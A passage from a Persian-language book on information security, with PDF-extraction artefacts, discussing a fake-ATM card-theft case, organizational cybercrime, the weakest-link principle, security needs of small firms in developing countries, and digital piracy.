‫ﺑﺰﺭﮔﺘﺮﻳﻦ ﺍﺷﻜﺎﻟﻲ ﻛﻪ ﺗـﺎ ﻛﻨـﻮﻥ ﺩﺭ ‪ Windows‬ﻳﺎﻓـﺖ‬
‫‪٦١‬‬
‫ﺷﺪﻩ ﻣﻌﺮﻓﻲ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺣﻤﻼﺕ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻧـﺴﺒﺘﹰﺎ ﻏﻴﺮﺣﺮﻓـﻪﺍﻱ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﻣﺎﺟﺮﺍﻳﻲ ﻃﻮﻻﻧﻲ ﻭ ﺩﻧﺒﺎﻟﻪﺩﺍﺭ ﺍﺳﺖ‪.‬‬
‫ﺍﻟﺒﺘﻪ ﺗﻤـﺎﻣﻲ ﻧﻘـﺾ ﺣﺮﻳﻤﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺨـﺘﺺ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﻧﻴـﺰ ﺗـﺎ ﻛﻨـﻮﻥ ﺑـﺮﺍﻱ‬
‫ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪ .‬ﺩﺭ ﻳﻚ‬
‫ﻣﻮﺭﺩ )ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻧﻜﺘﻴﻜﺎﺕ‪ ٦٢‬ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺳﺎﺭﻗﻴﻦ ﺍﻗﺪﺍﻡ ﺑﻪ ﻧـﺼﺐ‬
‫ﺩﺳﺘﮕﺎﻫﻲ ﺷﺒﻴﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺩﺭ ﻳﻚ ﻣﺮﻛﺰ ﺧﺮﻳﺪ ﻛﺮﺩﻧـﺪ‪.‬‬
‫‪CNet News.com ,July 25,2003‬‬
‫‪Connecticut State‬‬
‫‪61‬‬
‫‪62‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺮﺩﻡ ﺑﺮﺍﻱ ﮔـﺮﻓﺘﻦ ﭘـﻮﻝ ﺍﺯ ﺍﻳـﻦ ﻣﺎﺷـﻴﻦ ﻛـﺎﺭﺕ ﻭ‬
‫ﺷﻤﺎﺭﺓ ﺭﻣﺰ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﺮﺩﻧﺪ‪ ،‬ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﺟﻌﻠﻲ ﺑﺎ ﺫﺧﻴـﺮﺓ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻌﺪﻱ ﺑﻪ ﺍﻳـﻦ ﺣـﺴﺎﺑﻬﺎ ﺭﺍ‬
‫ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﻣﻲﻛﺮﺩ‪ ،‬ﺍﻣﺎ ﭼﻮﻥ ﺍﺗﺼﺎﻟﻲ ﺑﺎ ﻣﺮﺍﻛﺰ ﻭﺍﻗﻌﻲ ﺍﻋﺘﺒـﺎﺭﻱ‬
‫ﻧﺪﺍﺷﺖ ﻗﺎﺩﺭ ﺑﻪ ﺗﻜﻤﻴﻞ ﻋﻤﻠﻴﺎﺕ ﻣﺎﻟﻲ ﻧﺒﻮﺩ‪ .‬ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﺩﻳﮕـﺮ‬
‫ﺳﺎﺭﻗﻴﻦ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺑﻪ ﻧﺤﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ ﻛـﻪ‬
‫ﺍﻣﻜﺎﻥ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻣـﺪﺗﻲ ﺑﻌـﺪ ﻭ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺛﺒﺖﺷﺪﻩ ﺍﻗﺪﺍﻡ ﺑﻪ ﺳﺮﻗﺖ ﻣﻲﻧﻤﻮﺩﻧﺪ‪.‬‬
‫ﻞ ﻣﺸﺎﻫﺪﻩ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﺗﻮﺳﻂ ﺍﻓـﺮﺍﺩ‬
‫ﺍﮔﺮﭼﻪ ﺑﻴﺸﺘﺮ ﺟﺮﺍﺋ ﹺﻢ ﻗﺎﺑ ﹺ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳـﺴﺎﺕ ﻧﻴـﺰ ﻗـﺎﺩﺭ ﺑـﻪ ﺳـﻮﺀ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﺍﻳـﻦ ﻓـﻀﺎ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﻥ ﺑـﻪ ﺍﻫـﺪﺍﻑ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺟـﺮﺍﺋﻢ ﺳـﺎﺯﻣﺎﻧﺪﻫﻲﺷـﺪﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺩﺳﺘﻜﺎﺭﻱ ﺩﺭ ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺭﺳﻴﺪﻥ ﺑـﻪ ﻧﺘـﺎﻳﺞ ﻣﻄﻠـﻮﺏ‬
‫ﺁﻧﻬﺎ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﻋﻠﻴـﻪ ﺩﻳﮕـﺮﺍﻥ ﻧﻴـﺰ‬
‫ﺑﺸﻮﺩ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻋﻼﻗـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﻛـﻪ‬
‫ﻧﺘﻴﺠﺔ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻲ ﻳﺎ ﺣﺘﻲ ﺍﻧﺘﺨﺎﺑﺎﺕ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﻨﻨـﺪ ﺗـﺎ‬
‫ﺑﻪ ﻧﺘﺎﻳﺞ ﻣﻄﻠﻮﺏ ﺧﻮﺩ ﺑﺮﺳﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻣﺆﺳﺴﺎﺕ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ‬
‫ﺭﻭﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﺘﻮﺍﻧﻨﺪ ﺗﺎ ﻣﺪﺗﻬﺎ ﺁﻧﺮﺍ ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﻗﻮﺕ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ‪.‬‬
‫ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﻣﻨﺎﻓﻊ ﺑﺎﻟﻘﻮﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﻋـﺼﺮ ﻧـﻮﻳﻦ ﺩﻳﺠﻴﺘـﺎﻝ‬
‫ﺑﻴﺸﻤﺎﺭ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳـﺖ ﻛـﻪ ﺑـﺎ ﺍﻳﻤـﻦﺳـﺎﺯﻱ‬
‫ﻣﺤﻴﻂ ﻓﻴﺰﻳﻜﻲ‪ ،‬ﺯﻳﺮﺳﺎﺧﺘﻬﺎ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﻫﺎ‪ ،‬ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻣﻨـﺎﺑﻊ‬
‫ﻲ ﺧﻮﺩ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﻓﻊ ﺣﻔﺎﻇﺖ ﻛﻨﻴﻢ‪ .‬ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺩﺭ ﺍﻧﺠﺎﻡ‬
‫ﺍﻃﻼﻋﺎﺗ ﹺ‬
‫ﺍﻳﻦ ﻣﻬﻢ ﺭﺳﻴﺪﻥ ﺑﻪ ﺳﻄﺢ ﺷﻨﺎﺧﺖ ﻛﺎﻓﻲ ﻭ ﺻﺤﻴﺢ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ‬
‫ﻲ‬
‫ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺗﺨﺎﺫ ﺗﺼﻤﻴﻤﺎﺕ ﻋﺎﻗﻼﻧﻪ ﺩﺭﺑﺎﺭﺓ ﭼﮕﻮﻧﮕ ﹺ‬
‫ﺭﺳﻴﺪﻥ ﺑﻪ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺎ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ‬
‫ﺍﺯ ﻣﺎ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﭼﻨﺪﻳﻦ ﻧﻘـﺶ ﺭﺍ ﺑـﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻳـﻢ‪ :‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﻴﻢ‪ ،‬ﺩﺭ‬
‫ﻗﺒﺎﻝ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺧﺪﻣﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ‪ ،‬ﻭ ﻳﺎ ﺑﻪ ﻫﻤﻜﺎﺭﻱ ﺑـﺎ ﺩﻭﻟـﺖ ﺩﺭ ﺍﺟـﺮﺍﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﻤﺎﻳﺘﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻋﻼﻗﻪﻣﻨﺪ ﺑﺎﺷﻴﻢ‪.‬‬
‫ﻫﻤﺔ ﻣﺎ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻧﻘﺸﻬﺎ ﺩﺭ ﻗﺒﺎﻝ ﺗﺤﻘﻖ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ‬
‫ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﺴﺌﻮﻝ ﻫـﺴﺘﻴﻢ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ‬
‫ﻻ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺍﻣﻨﻴـﺖ ﺿـﻌﻴﻔﺘﺮﻳﻦ ﺟـﺰ ِﺀ ﺁﻥ ﻣﺤـﻴﻂ‬
‫ﭘﻴﭽﻴﺪﻩ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺘﺤﻜﺎﻡ ﺩﺍﺭﺩ؛ ﺍﺯ ﺍﻳﻨﺮﻭ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﻛﻪ ﺍﺟﺰﺍﻱ ﻣﺤﻴﻄـﻲ‬
‫ﻦ‬
‫ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻛﻨﺘﺮﻝ ﺩﺍﺭﻳﻢ ﺁﻧﻘﺪﺭ ﻗﻮﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺿـﻌﻴﻔﺘﺮﻳ ﹺ‬
‫‪٤١‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺍﻫﻤﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ‬
‫ﻣﺘﻮﺳﻂ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫ﺑﺎ ﺍﻳﻨﻜﻪ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﻫﻤـﻪ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺑـﺮﺍﻱ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻫﻤﻴﺖ‬
‫ﻭﻳﮋﻩ ﺍﻱ ﺩﺍﺭﺩ‪ .‬ﻧﺘﺎﻳﺞ ﺣﺎﺻﻞ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺑﺎﺯﺍﺭ ﺟﻬـﺎﻧﻲ ﺑـﺎ ﻛﻤـﻚ‬
‫ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﺑــﺴﻴﺎﺭ ﻣﻄﻠــﻮﺏ ﺍﺳــﺖ‪ ،‬ﻭﻟــﻲ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺼﻮﺭﺕ ﻧﺎﺍﻣﻦ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺍﺳﺎﺳﻲ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺻﻨﺎﻑ ﺗﺠﺎﺭﻱ‪ ،‬ﻋﻤﻠﻴﺎﺕ ﺩﺳﺘﻲ ﺑـﻪ ﻣـﺪﻳﺮﻳﺖ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘـﻪ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣـﺴﺘﻘﻞ‬
‫ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻋﺮﺻــﻪﻫــﺎﻱ ﺍﻗﺘــﺼﺎﺩﻱ ﻛــﺸﻮﺭﻫﺎﻱ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺑﺮﺍﻱ ﻣﺪﺕﺯﻣﺎﻧﻲ ﻣﺸﺨﺺ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺑﺎ ﻣﻌﺮﻓـﻲ‬
‫ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺪﻳﺪ‪ ،‬ﻣﺪﻳﺮﺍﻥ ﺑﻪ ﺳﻤﺖ ﻭ ﺳﻮﻱ ﻛﺴﺐ ﺩﺍﻧﺶ ﻭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺕ ﻛﺎﺭﺑﺮﺩﻱ ﭼﻮﻥ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ‪،٦٣‬‬
‫‪٦٤‬‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺷﺒﻜﻪ‪ ،‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻣﻤﻴـﺰﻱ )ﺑـﺎﺯﺑﻴﻨﻲ(‬
‫ﻲ ﻣـﻮﺍﺭﺩ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﺮﻛﺖ ﻫﺴﺘﻨﺪ‪ .‬ﻛﺴﺐ ﻣﻮﻓﻘﻴـﺖ ﺩﺭ ﻫﻤﮕـ ﹺ‬
‫ﻓــﻮﻕ ﻣــﺴﺘﻠﺰﻡ ﺁﺷــﻨﺎﻳﻲ ﺑــﺎ ﺭﺍﻳﺎﻧــﻪ‪ ،‬ﺷــﺒﻜﻪ‪ ،‬ﻭ ﻣﻔــﺎﻫﻴﻢ ﺍﻣﻨﻴــﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ‪.‬‬
‫ﺑﺎ ﻣﻌﺮﻓﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻭ ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺑﻪ ﻋﺮﺻـﺔ ﺗﺠـﺎﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺑﺎﻳـﺪ ﺍﺯ‬
‫ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﻣﺘﻔﺎﻭﺕ ﻧﻈﺎﺭﻩ ﺷـﻮﻧﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣـﺴﺘﻘﻞ ﻋﻤﻮﻣـﹰﺎ‬
‫ﻣﺤﺼﻮﻝﻣﺤﻮﺭ ﻳﺎ ﻓﺮﺁﻳﻨﺪﻣﺤﻮﺭ ﻫﺴﺘﻨﺪ )ﻣﺜﻞ ﺍﻧﺒﺎﺭﺩﺍﺭﻱ‪ ،‬ﺳﻔﺎﺭﺷﺎﺕ ﻳـﺎ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﻧﻈﻴﺮ ﺗﻮﻟﻴﺪ‪ ،‬ﺛﺒﺖ ﺩﺭ ﺩﻓﺎﺗﺮ ﻋﻤـﻮﻣﻲ‪ ،‬ﻭ ﺣـﺴﺎﺑﻬﺎﻱ ﭘﺮﺩﺍﺧﺘﻨـﻲ ﻭ‬
‫ﺩﺭﻳـﺎﻓﺘﻨﻲ(‪ ،‬ﺍﻣﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻮﻓﻖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺧﻂ ﺑـﻪ‬
‫ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﻲ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﺮﺍﻱ‬
‫ﻛﺴﺐ ﻣﻮﻓﻘﻴﺖ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻃﺮﺍﺣـﻲ ﻣـﺸﺘﺮﻱﻣـﺪﺍﺭ ﺑﺎﺷـﺪ ﻭ‬
‫ﺳﻴﺴﺘﻢ ﺑﻪ ﺗﻌﻘﻴـﺐ ﺭﻓﺘـﺎﺭ ﻣـﺸﺘﺮﻱ ﺩﺭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺟـﺴﺘﺠﻮ ﻭ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺤﺼﻮﻻﺕ‪ ،‬ﺍﺭﺍﺋﻪ ﺳﻔﺎﺭﺵ‪ ،‬ﺗﻜﻤﻴﻞ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣـﺎﻟﻲ ﻭ‬
‫ﺭﺩﮔﻴﺮﻱ ﻣﺤﺼﻮﻝ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺑﭙﺮﺩﺍﺯﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻧﮕﺮﺍﻧﻲ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺼﻮﻻﺕ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎ ﻫﻤﭽﻨﺎﻥ ﻣﻬـﻢ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺩﺭ‬
‫ﻞ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻘﻴﺐ ﺭﻓﺘﺎﺭ ﻣﺸﺘﺮﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﺍﻧﺠـﺎﻡ ﻫـﺮ‬
‫ﻣﻘﺎﺑ ﹺ‬
‫ﻣﻌﺎﻣﻠﻪﺍﻱ ﻛﻪ ﻣﺸﺘﺮﻱ ﺁﻧﺮﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨﺪ ﺩﺭ ﺍﻭﻟﻮﻳﺖ ﺑﻌـﺪﻱ‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﻣﺠﺪﺩ ﺑﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﻣﻮﻓﻘﻴـﺖ‬
‫‪Backup‬‬
‫‪Audit‬‬
‫‪63‬‬
‫‪64‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ ﺑﺎﻳـﺪ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺍﺻـﻼﺡ‬
‫ﻧﮕــﺮﺵ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺗﺠــﺎﺭﻱ ﺑــﺮﺍﻱ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺍﻳﻨﺘﺮﻧــﺖ‪،‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪﻱ ﺑـﺮﺍﻱ ﺁﻧﻬـﺎ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺭﺩ‪ .‬ﻳﻜـﻲ ﺍﺯ ﺍﻳـﻦ‬
‫ﺧﻄﺮﺍﺕ ﺍﺯ ﻫﻤﻪ ﺟﺪﻳﺪﺗﺮ ﺍﺳﺖ‪ :‬ﺍﺣﺘﻤﺎﻝ ﺑـﻪ ﺳـﺮﻗﺖ ﺭﻓـﺘﻦ ﻭ ﺩﺭ‬
‫ﻣﻌﺮﺽ ﻓﺮﻭﺵ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺷـﺮﻛﺖ‪ .‬ﺩﺭ‬
‫ﻋﺼﺮﻱ ﻛـﻪ ﻛﺎﻻﻫـﺎ ﻭ ﺧـﺪﻣﺎﺕ ﻓﺮﻭﺧﺘـﻪﺷـﺪﻩ ﺭﺍ ﻣﺤـﺼﻮﻻﺕ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺗﻮﺯﻳﻊ ﻭ ﺗﻬﻴـﺔ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ‬
‫ﺁﻧﻬﺎ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻭ ﻳـﺎ ﺩﺭ ﺑـﺎﺯﺍﺭ ﺳـﻴﺎﻩ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ‬
‫ﺍﻳﻨﺤﺎﻟﺖ ﻣﻨﺎﻓﻊ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺳﺎﺭﻗﺎﻥ ﻣﻲﺭﺳﺪ‪ ،‬ﻭ ﻧﻪ ﺑﻪ ﺷﺮﻛﺘﻲ ﻛـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺎﺭﺯﺗﺮﻳﻦ ﻧﻤﻮﻧﺔ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻛﻪ ﺍﻣـﺮﻭﺯﻩ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛـﺮﺩ ﺩﺭ ﺻـﻨﻌﺖ ﻣﻮﺳـﻴﻘﻲ ﺭﻭﺍﺝ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﻪ ﺗﻮﺯﻳـﻊ‬
‫ﻣﺤﺼﻮﻻﺕ ﻣﺴﺮﻭﻗﻪ ﻭ ﻏﺎﻟﺒﹰﺎ ﻫﻢ ﺩﺭ ﻗﺎﻟﺐ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﻣﻨﺠـﺮ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳـﺮﻣﺎﻳﻪ ﻫـﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ‬
‫ﻣﺴﺌﻠﻪﺍﻱ ﺣﻞﻧﺸﺪﻩ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﻫﺮﭼﻨـﺪ ﺑـﺮﺍﻱ ﺣـﻞ ﺁﻥ ﺍﻗـﺪﺍﻣﺎﺕ‬
‫ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺩﻳﺮﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻧـﺴﺨﻪﺑﺮﺩﺍﺭﻳﻬـﺎﻱ ﻧـﺴﺒﺘﹰﺎ ﻛـﺎﻣﻠﻲ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺁﺳﺎﻥ ﺑﻮﺩﻩ ﻭ ﺣﻴﻦ ﻓﺮﻭﺵ‬
‫ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻪ ﺩﻧﺒﺎﻝ ﻧﺴﺨﻪ ﺍﺻﻠﻲ ﺁﻥ ﺑﻮﺩ‪ .‬ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺻﻨﻌﺖ ﻣﻮﺳﻴﻘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺷﺮﺍﻳﻂ ﻭ ﻣﺤﻴﻄﻬﺎﻱ‬
